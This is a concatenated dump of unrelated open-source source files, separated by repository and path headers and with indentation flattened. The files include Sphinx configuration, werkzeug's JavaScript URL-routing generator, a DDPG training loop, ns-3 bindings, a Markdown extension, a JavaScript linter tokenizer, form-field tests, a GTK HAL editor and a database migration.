# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'wptservedoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'wptserve.tex', u'wptserve Documentation',
u'James Graham', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'wptserve', u'wptserve Documentation',
[u'James Graham'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'wptserve', u'wptserve Documentation',
u'James Graham', 'wptserve', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
fidodaj/project2 | refs/heads/master | server/lib/werkzeug/contrib/jsrouting.py | 318 | # -*- coding: utf-8 -*-
"""
werkzeug.contrib.jsrouting
~~~~~~~~~~~~~~~~~~~~~~~~~~
Addon module that allows to create a JavaScript function from a map
that generates rules.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
try:
from simplejson import dumps
except ImportError:
try:
from json import dumps
except ImportError:
def dumps(*args):
raise RuntimeError('simplejson required for jsrouting')
from inspect import getmro
from werkzeug.routing import NumberConverter
from werkzeug._compat import iteritems
def render_template(name_parts, rules, converters):
result = u''
if name_parts:
for idx in xrange(0, len(name_parts) - 1):
name = u'.'.join(name_parts[:idx + 1])
result += u"if (typeof %s === 'undefined') %s = {}\n" % (name, name)
result += '%s = ' % '.'.join(name_parts)
result += """(function (server_name, script_name, subdomain, url_scheme) {
var converters = %(converters)s;
var rules = $rules;
function in_array(array, value) {
if (array.indexOf != undefined) {
return array.indexOf(value) != -1;
}
for (var i = 0; i < array.length; i++) {
if (array[i] == value) {
return true;
}
}
return false;
}
function array_diff(array1, array2) {
array1 = array1.slice();
for (var i = array1.length-1; i >= 0; i--) {
if (in_array(array2, array1[i])) {
array1.splice(i, 1);
}
}
return array1;
}
function split_obj(obj) {
var names = [];
var values = [];
for (var name in obj) {
if (typeof(obj[name]) != 'function') {
names.push(name);
values.push(obj[name]);
}
}
return {names: names, values: values, original: obj};
}
function suitable(rule, args) {
var default_args = split_obj(rule.defaults || {});
var diff_arg_names = array_diff(rule.arguments, default_args.names);
for (var i = 0; i < diff_arg_names.length; i++) {
if (!in_array(args.names, diff_arg_names[i])) {
return false;
}
}
if (array_diff(rule.arguments, args.names).length == 0) {
if (rule.defaults == null) {
return true;
}
for (var i = 0; i < default_args.names.length; i++) {
var key = default_args.names[i];
var value = default_args.values[i];
if (value != args.original[key]) {
return false;
}
}
}
return true;
}
function build(rule, args) {
var tmp = [];
var processed = rule.arguments.slice();
for (var i = 0; i < rule.trace.length; i++) {
var part = rule.trace[i];
if (part.is_dynamic) {
var converter = converters[rule.converters[part.data]];
var data = converter(args.original[part.data]);
if (data == null) {
return null;
}
tmp.push(data);
processed.push(part.name);
} else {
tmp.push(part.data);
}
}
tmp = tmp.join('');
var pipe = tmp.indexOf('|');
var subdomain = tmp.substring(0, pipe);
var url = tmp.substring(pipe+1);
var unprocessed = array_diff(args.names, processed);
var first_query_var = true;
for (var i = 0; i < unprocessed.length; i++) {
if (first_query_var) {
url += '?';
} else {
url += '&';
}
first_query_var = false;
url += encodeURIComponent(unprocessed[i]);
url += '=';
url += encodeURIComponent(args.original[unprocessed[i]]);
}
return {subdomain: subdomain, path: url};
}
function lstrip(s, c) {
while (s && s.substring(0, 1) == c) {
s = s.substring(1);
}
return s;
}
function rstrip(s, c) {
while (s && s.substring(s.length-1, s.length) == c) {
s = s.substring(0, s.length-1);
}
return s;
}
return function(endpoint, args, force_external) {
args = split_obj(args);
var rv = null;
for (var i = 0; i < rules.length; i++) {
var rule = rules[i];
if (rule.endpoint != endpoint) continue;
if (suitable(rule, args)) {
rv = build(rule, args);
if (rv != null) {
break;
}
}
}
if (rv == null) {
return null;
}
if (!force_external && rv.subdomain == subdomain) {
return rstrip(script_name, '/') + '/' + lstrip(rv.path, '/');
} else {
return url_scheme + '://'
+ (rv.subdomain ? rv.subdomain + '.' : '')
+ server_name + rstrip(script_name, '/')
+ '/' + lstrip(rv.path, '/');
}
};
})""" % {'converters': u', '.join(converters)}
return result
def generate_map(map, name='url_map'):
"""
Generates a JavaScript function containing the rules defined in
this map, to be used with a MapAdapter's generate_javascript
method. If you don't pass a name the returned JavaScript code is
an expression that returns a function. Otherwise it's a standalone
script that assigns the function with that name. Dotted names are
resolved (so you an use a name like 'obj.url_for')
In order to use JavaScript generation, simplejson must be installed.
Note that using this feature will expose the rules
defined in your map to users. If your rules contain sensitive
information, don't use JavaScript generation!
"""
from warnings import warn
warn(DeprecationWarning('This module is deprecated'))
map.update()
rules = []
converters = []
for rule in map.iter_rules():
trace = [{
'is_dynamic': is_dynamic,
'data': data
} for is_dynamic, data in rule._trace]
rule_converters = {}
for key, converter in iteritems(rule._converters):
js_func = js_to_url_function(converter)
try:
index = converters.index(js_func)
except ValueError:
converters.append(js_func)
index = len(converters) - 1
rule_converters[key] = index
rules.append({
u'endpoint': rule.endpoint,
u'arguments': list(rule.arguments),
u'converters': rule_converters,
u'trace': trace,
u'defaults': rule.defaults
})
return render_template(name_parts=name and name.split('.') or [],
rules=dumps(rules),
converters=converters)
def generate_adapter(adapter, name='url_for', map_name='url_map'):
"""Generates the url building function for a map."""
values = {
u'server_name': dumps(adapter.server_name),
u'script_name': dumps(adapter.script_name),
u'subdomain': dumps(adapter.subdomain),
u'url_scheme': dumps(adapter.url_scheme),
u'name': name,
u'map_name': map_name
}
return u'''\
var %(name)s = %(map_name)s(
%(server_name)s,
%(script_name)s,
%(subdomain)s,
%(url_scheme)s
);''' % values
def js_to_url_function(converter):
"""Get the JavaScript converter function from a rule."""
if hasattr(converter, 'js_to_url_function'):
data = converter.js_to_url_function()
else:
for cls in getmro(type(converter)):
if cls in js_to_url_functions:
data = js_to_url_functions[cls](converter)
break
else:
return 'encodeURIComponent'
return '(function(value) { %s })' % data
def NumberConverter_js_to_url(conv):
if conv.fixed_digits:
return u'''\
var result = value.toString();
while (result.length < %s)
result = '0' + result;
return result;''' % conv.fixed_digits
return u'return value.toString();'
js_to_url_functions = {
NumberConverter: NumberConverter_js_to_url
}
|
peheje/baselines | refs/heads/master | baselines/ddpg/training.py | 4 | import os
import time
from collections import deque
import pickle
from baselines.ddpg.ddpg import DDPG
from baselines.ddpg.util import mpi_mean, mpi_std, mpi_max, mpi_sum
import baselines.common.tf_util as U
from baselines import logger
import numpy as np
import tensorflow as tf
from mpi4py import MPI
def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic,
normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise,
popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory,
tau=0.01, eval_env=None, param_noise_adaption_interval=50):
rank = MPI.COMM_WORLD.Get_rank()
assert (np.abs(env.action_space.low) == env.action_space.high).all() # we assume symmetric actions.
max_action = env.action_space.high
logger.info('scaling actions by {} before executing in env'.format(max_action))
agent = DDPG(actor, critic, memory, env.observation_space.shape, env.action_space.shape,
gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations,
batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg,
actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm,
reward_scale=reward_scale)
logger.info('Using agent with the following configuration:')
logger.info(str(agent.__dict__.items()))
# Set up logging stuff only for a single worker.
if rank == 0:
saver = tf.train.Saver()
else:
saver = None
step = 0
episode = 0
eval_episode_rewards_history = deque(maxlen=100)
episode_rewards_history = deque(maxlen=100)
with U.single_threaded_session() as sess:
# Prepare everything.
agent.initialize(sess)
sess.graph.finalize()
agent.reset()
obs = env.reset()
if eval_env is not None:
eval_obs = eval_env.reset()
done = False
episode_reward = 0.
episode_step = 0
episodes = 0
t = 0
epoch = 0
start_time = time.time()
epoch_episode_rewards = []
epoch_episode_steps = []
epoch_episode_eval_rewards = []
epoch_episode_eval_steps = []
epoch_start_time = time.time()
epoch_actions = []
epoch_qs = []
epoch_episodes = 0
for epoch in range(nb_epochs):
for cycle in range(nb_epoch_cycles):
# Perform rollouts.
for t_rollout in range(nb_rollout_steps):
# Predict next action.
action, q = agent.pi(obs, apply_noise=True, compute_Q=True)
assert action.shape == env.action_space.shape
# Execute next action.
if rank == 0 and render:
env.render()
assert max_action.shape == action.shape
new_obs, r, done, info = env.step(max_action * action) # scale for execution in env (as far as DDPG is concerned, every action is in [-1, 1])
t += 1
if rank == 0 and render:
env.render()
episode_reward += r
episode_step += 1
# Book-keeping.
epoch_actions.append(action)
epoch_qs.append(q)
agent.store_transition(obs, action, r, new_obs, done)
obs = new_obs
if done:
# Episode done.
epoch_episode_rewards.append(episode_reward)
episode_rewards_history.append(episode_reward)
epoch_episode_steps.append(episode_step)
episode_reward = 0.
episode_step = 0
epoch_episodes += 1
episodes += 1
agent.reset()
obs = env.reset()
# Train.
epoch_actor_losses = []
epoch_critic_losses = []
epoch_adaptive_distances = []
for t_train in range(nb_train_steps):
# Adapt param noise, if necessary.
if memory.nb_entries >= batch_size and t % param_noise_adaption_interval == 0:
distance = agent.adapt_param_noise()
epoch_adaptive_distances.append(distance)
cl, al = agent.train()
epoch_critic_losses.append(cl)
epoch_actor_losses.append(al)
agent.update_target_net()
# Evaluate.
eval_episode_rewards = []
eval_qs = []
if eval_env is not None:
eval_episode_reward = 0.
for t_rollout in range(nb_eval_steps):
eval_action, eval_q = agent.pi(eval_obs, apply_noise=False, compute_Q=True)
eval_obs, eval_r, eval_done, eval_info = eval_env.step(max_action * eval_action) # scale for execution in env (as far as DDPG is concerned, every action is in [-1, 1])
if render_eval:
eval_env.render()
eval_episode_reward += eval_r
eval_qs.append(eval_q)
if eval_done:
eval_obs = eval_env.reset()
eval_episode_rewards.append(eval_episode_reward)
eval_episode_rewards_history.append(eval_episode_reward)
eval_episode_reward = 0.
# Log stats.
epoch_train_duration = time.time() - epoch_start_time
duration = time.time() - start_time
stats = agent.get_stats()
combined_stats = {}
for key in sorted(stats.keys()):
combined_stats[key] = mpi_mean(stats[key])
# Rollout statistics.
combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards)
combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history))
combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps)
combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes)
combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions)
combined_stats['rollout/actions_std'] = mpi_std(epoch_actions)
combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs)
# Train statistics.
combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses)
combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses)
combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances)
# Evaluation statistics.
if eval_env is not None:
combined_stats['eval/return'] = mpi_mean(eval_episode_rewards)
combined_stats['eval/return_history'] = mpi_mean(np.mean(eval_episode_rewards_history))
combined_stats['eval/Q'] = mpi_mean(eval_qs)
combined_stats['eval/episodes'] = mpi_mean(len(eval_episode_rewards))
# Total statistics.
combined_stats['total/duration'] = mpi_mean(duration)
combined_stats['total/steps_per_second'] = mpi_mean(float(t) / float(duration))
combined_stats['total/episodes'] = mpi_mean(episodes)
combined_stats['total/epochs'] = epoch + 1
combined_stats['total/steps'] = t
for key in sorted(combined_stats.keys()):
logger.record_tabular(key, combined_stats[key])
logger.dump_tabular()
logger.info('')
logdir = logger.get_dir()
if rank == 0 and logdir:
if hasattr(env, 'get_state'):
with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f:
pickle.dump(env.get_state(), f)
if eval_env and hasattr(eval_env, 'get_state'):
with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f:
pickle.dump(eval_env.get_state(), f)
|
nichit93/Implementation-of-TRED-in-ns-3 | refs/heads/master | src/internet-apps/bindings/callbacks_list.py | 240 | callback_classes = [
['void', 'ns3::Ptr<ns3::Socket>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::Socket>', 'unsigned int', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::Socket>', 'ns3::Address const&', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::Socket>', 'ns3::Address const&', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['unsigned char', 'ns3::Ptr<ns3::QueueItem>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
]
|
XiaosongWei/chromium-crosswalk | refs/heads/master | third_party/Python-Markdown/markdown/extensions/smart_strong.py | 123 | '''
Smart_Strong Extension for Python-Markdown
==========================================
This extention adds smarter handling of double underscores within words.
See <https://pythonhosted.org/Markdown/extensions/smart_strong.html>
for documentation.
Original code Copyright 2011 [Waylan Limberg](http://achinghead.com)
All changes Copyright 2011-2014 The Python Markdown Project
License: [BSD](http://www.opensource.org/licenses/bsd-license.php)
'''
from __future__ import absolute_import
from __future__ import unicode_literals
from . import Extension
from ..inlinepatterns import SimpleTagPattern
SMART_STRONG_RE = r'(?<!\w)(_{2})(?!_)(.+?)(?<!_)\2(?!\w)'
STRONG_RE = r'(\*{2})(.+?)\2'
class SmartEmphasisExtension(Extension):
""" Add smart_emphasis extension to Markdown class."""
def extendMarkdown(self, md, md_globals):
""" Modify inline patterns. """
md.inlinePatterns['strong'] = SimpleTagPattern(STRONG_RE, 'strong')
md.inlinePatterns.add(
'strong2',
SimpleTagPattern(SMART_STRONG_RE, 'strong'),
'>emphasis2'
)
def makeExtension(*args, **kwargs):
return SmartEmphasisExtension(*args, **kwargs)
|
chbfiv/fabric-engine-old | refs/heads/ver-1.1.0-alpha | Native/ThirdParty/Private/Python/closure_linter/common/tokenizer.py | 157 | #!/usr/bin/env python
#
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Regular expression based lexer."""
__author__ = ('[email protected] (Robert Walker)',
'[email protected] (Andy Perelson)')
from closure_linter.common import tokens
# Shorthand
Type = tokens.TokenType
class Tokenizer(object):
"""General purpose tokenizer.
Attributes:
mode: The latest mode of the tokenizer. This allows patterns to distinguish
if they are mid-comment, mid-parameter list, etc.
matchers: Dictionary of modes to sequences of matchers that define the
patterns to check at any given time.
default_types: Dictionary of modes to types, defining what type to give
non-matched text when in the given mode. Defaults to Type.NORMAL.
"""
def __init__(self, starting_mode, matchers, default_types):
"""Initialize the tokenizer.
Args:
starting_mode: Mode to start in.
matchers: Dictionary of modes to sequences of matchers that defines the
patterns to check at any given time.
default_types: Dictionary of modes to types, defining what type to give
non-matched text when in the given mode. Defaults to Type.NORMAL.
"""
self.__starting_mode = starting_mode
self.matchers = matchers
self.default_types = default_types
def TokenizeFile(self, file):
"""Tokenizes the given file.
Args:
file: An iterable that yields one line of the file at a time.
Returns:
The first token in the file
"""
# The current mode.
self.mode = self.__starting_mode
# The first token in the stream.
self.__first_token = None
# The last token added to the token stream.
self.__last_token = None
# The current line number.
self.__line_number = 0
for line in file:
self.__line_number += 1
self.__TokenizeLine(line)
return self.__first_token
def _CreateToken(self, string, token_type, line, line_number, values=None):
"""Creates a new Token object (or subclass).
Args:
string: The string of input the token represents.
token_type: The type of token.
line: The text of the line this token is in.
line_number: The line number of the token.
values: A dict of named values within the token. For instance, a
function declaration may have a value called 'name' which captures the
name of the function.
Returns:
The newly created Token object.
"""
return tokens.Token(string, token_type, line, line_number, values)
def __TokenizeLine(self, line):
"""Tokenizes the given line.
Args:
line: The contents of the line.
"""
string = line.rstrip('\n\r\f')
line_number = self.__line_number
self.__start_index = 0
if not string:
self.__AddToken(self._CreateToken('', Type.BLANK_LINE, line, line_number))
return
normal_token = ''
index = 0
while index < len(string):
for matcher in self.matchers[self.mode]:
if matcher.line_start and index > 0:
continue
match = matcher.regex.match(string, index)
if match:
if normal_token:
self.__AddToken(
self.__CreateNormalToken(self.mode, normal_token, line,
line_number))
normal_token = ''
# Add the match.
self.__AddToken(self._CreateToken(match.group(), matcher.type, line,
line_number, match.groupdict()))
# Change the mode to the correct one for after this match.
self.mode = matcher.result_mode or self.mode
# Shorten the string to be matched.
index = match.end()
break
else:
# If the for loop finishes naturally (i.e. no matches) we just add the
# first character to the string of consecutive non match characters.
# These will constitute a NORMAL token.
if string:
normal_token += string[index:index + 1]
index += 1
if normal_token:
self.__AddToken(
self.__CreateNormalToken(self.mode, normal_token, line, line_number))
def __CreateNormalToken(self, mode, string, line, line_number):
"""Creates a normal token.
Args:
mode: The current mode.
string: The string to tokenize.
line: The line of text.
line_number: The line number within the file.
Returns:
A Token object, of the default type for the current mode.
"""
type = Type.NORMAL
if mode in self.default_types:
type = self.default_types[mode]
return self._CreateToken(string, type, line, line_number)
def __AddToken(self, token):
"""Add the given token to the token stream.
Args:
token: The token to add.
"""
# Store the first token, or point the previous token to this one.
if not self.__first_token:
self.__first_token = token
else:
self.__last_token.next = token
# Establish the doubly linked list
token.previous = self.__last_token
self.__last_token = token
# Compute the character indices
token.start_index = self.__start_index
self.__start_index += token.length
|
grouan/udata | refs/heads/master | udata/tests/forms/test_current_user_field.py | 1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from bson import ObjectId
from werkzeug.datastructures import MultiDict
from udata.auth import login_user
from udata.forms import ModelForm, fields
from udata.models import db, User
from udata.tests import TestCase
from udata.tests.factories import UserFactory, AdminFactory
class CurrentUserFieldTest(TestCase):
def factory(self, *args, **kwargs):
class Ownable(db.Document):
owner = db.ReferenceField(User)
class OwnableForm(ModelForm):
model_class = Ownable
owner = fields.CurrentUserField(*args, **kwargs)
return Ownable, OwnableForm
def test_empty_values(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm()
self.assertEqual(form.owner.data, user)
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_initial_value(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
ownable = Ownable(owner=user)
form = OwnableForm(None, ownable)
self.assertEqual(form.owner.data, user)
def test_with_valid_user_self(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm(MultiDict({
'owner': str(user.id)
}))
self.assertEqual(form.owner.data, user)
form.validate()
self.assertEqual(form.errors, {})
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_with_other_user(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
other = UserFactory()
login_user(user)
form = OwnableForm(MultiDict({
'owner': str(other.id)
}))
self.assertEqual(form.owner.data, other)
form.validate()
self.assertIn('owner', form.errors)
self.assertEqual(len(form.errors['owner']), 1)
def test_with_other_user_admin(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
admin = AdminFactory()
login_user(admin)
form = OwnableForm(MultiDict({
'owner': str(user.id)
}))
self.assertEqual(form.owner.data, user)
form.validate()
self.assertEqual(form.errors, {})
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_with_valid_user_self_json(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm.from_json({
'owner': str(user.id)
})
self.assertEqual(form.owner.data, user)
form.validate()
self.assertEqual(form.errors, {})
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_with_user_object_self_from_json(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm.from_json({
'owner': {'id': str(user.id)}
})
self.assertEqual(form.owner.data, user)
form.validate()
self.assertEqual(form.errors, {})
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_with_invalid_data(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm(MultiDict({
'owner': str('wrongwith12c')
}))
form.validate()
self.assertIn('owner', form.errors)
self.assertEqual(len(form.errors['owner']), 1)
def test_with_user_not_found(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm(MultiDict({
'owner': str(ObjectId())
}))
form.validate()
self.assertIn('owner', form.errors)
self.assertEqual(len(form.errors['owner']), 1)
def test_with_user_not_logged_found(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
form = OwnableForm(MultiDict({
'owner': str(user.id)
}))
form.validate()
self.assertIn('owner', form.errors)
self.assertEqual(len(form.errors['owner']), 1)
|
narogon/linuxcnc | refs/heads/add-hal-ethercat | src/hal/utils/halgui/app.py | 38 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os, sys, gtk, gobject
from design import Design
from load import file_load, file_new
from save import file_save
def appquit(*args):
gtk.main_quit()
def open_file(action):
app.openfile()
def save_file(action):
if app.design.file_name:
file_save(app.design, app.design.file_name)
else:
app.savefile()
def save_file_as(action):
app.savefile()
def new_file(action):
file_new(app.design)
def refresh(action):
app.design.update()
menu_entries = (
("FileMenu", None, "_File"),
("New", gtk.STOCK_NEW, None, "<control>N",
"Create a new file", new_file),
("Open", gtk.STOCK_OPEN, None, "<control>O",
"Open an existing file", open_file),
("Save", gtk.STOCK_SAVE, None, "<control>S",
"Save file", save_file),
("Save as", gtk.STOCK_SAVE_AS, None, "<shift><control>S",
"Save file with new name", save_file_as),
("Quit", gtk.STOCK_QUIT, None, "<control>Q",
"Quit program", appquit),
("ViewMenu", None, "_View"),
("Refresh", gtk.STOCK_REFRESH, None, "<control>R",
"Refresh", refresh),
)
class Application(gtk.Window):
def __init__(self, parent=None):
global app
app = self
gtk.Window.__init__(self)
try:
self.set_screen(parent.get_screen())
except AttributeError:
self.connect('destroy', lambda *w: gtk.main_quit())
self.design = Design(self)
actions = gtk.ActionGroup("Actions")
actions.add_actions(menu_entries)
ui = gtk.UIManager()
ui.insert_action_group(actions, 0)
self.add_accel_group(ui.get_accel_group())
# better path to 'ui.xml' needed
uifile = os.path.join(os.path.dirname(sys.argv[0]), "ui.xml")
try:
mergeid = ui.add_ui_from_file(uifile)
except gobject.GError, msg:
print "error building menus: %s" % (msg)
box1 = gtk.VBox(False, 0)
self.add(box1)
box1.pack_start(ui.get_widget("/MenuBar"), False, False)
box1.pack_start(ui.get_widget("/ToolBar"), False, False)
box1.pack_start(self.design, True, True)
statusbar = gtk.Statusbar()
box1.pack_start(statusbar, False, False)
self.set_default_size(1024, 768)
self.settitle()
self.set_border_width(0)
def show_app(self):
self.show_all()
def settitle(self):
if self.design.file_name:
self.set_title("Crapahalic - " + self.design.file_name)
else:
self.set_title("Crapahalic")
def openfile(self):
dialog = gtk.FileChooserDialog(title="Open...", action=gtk.FILE_CHOOSER_ACTION_OPEN,
buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
dialog.set_default_response(gtk.RESPONSE_OK)
hal_filter = gtk.FileFilter()
hal_filter.set_name("craphal files")
hal_filter.add_pattern("*.hal")
dialog.add_filter(hal_filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
new_file(None)
file_load(app.design, dialog.get_filename())
dialog.destroy()
def savefile(self):
dialog = gtk.FileChooserDialog(title="Save...", action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
dialog.set_default_response(gtk.RESPONSE_OK)
hal_filter = gtk.FileFilter()
hal_filter.set_name("craphal files")
hal_filter.add_pattern("*.hal")
dialog.add_filter(hal_filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
file_save(app.design, dialog.get_filename())
dialog.destroy()
|
frigg/frigg-test-discovery | refs/heads/master | setup.py | 1 | # -*- encoding: utf8 -*-
import sys
from setuptools import setup
import frigg_test_discovery
def _read_long_description():
try:
import pypandoc
return pypandoc.convert('README.md', 'rst', format='markdown')
except Exception:
return None
version = frigg_test_discovery.__version__
try:
from semantic_release import setup_hook
setup_hook(sys.argv)
except ImportError:
pass
setup(
name='frigg-test-discovery',
version=version,
description='Test discovery util for frigg-worker',
long_description=_read_long_description(),
author='The frigg team',
author_email='[email protected]',
license='MIT',
url='https://github.com/frigg/frigg-test-discovery',
py_modules=['frigg_test_discovery'],
include_package_data=True,
classifiers=[
'Programming Language :: Python :: 3',
]
)
|
apigee/edx-platform | refs/heads/master | lms/djangoapps/django_comment_client/migrations/0001_initial.py | 188 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Role'
db.create_table('django_comment_client_role', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=30)),
('course_id', self.gf('django.db.models.fields.CharField')(db_index=True, max_length=255, blank=True)),
))
db.send_create_signal('django_comment_client', ['Role'])
# Adding M2M table for field users on 'Role'
db.create_table('django_comment_client_role_users', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('role', models.ForeignKey(orm['django_comment_client.role'], null=False)),
('user', models.ForeignKey(orm['auth.user'], null=False))
))
db.create_unique('django_comment_client_role_users', ['role_id', 'user_id'])
# Adding model 'Permission'
db.create_table('django_comment_client_permission', (
('name', self.gf('django.db.models.fields.CharField')(max_length=30, primary_key=True)),
))
db.send_create_signal('django_comment_client', ['Permission'])
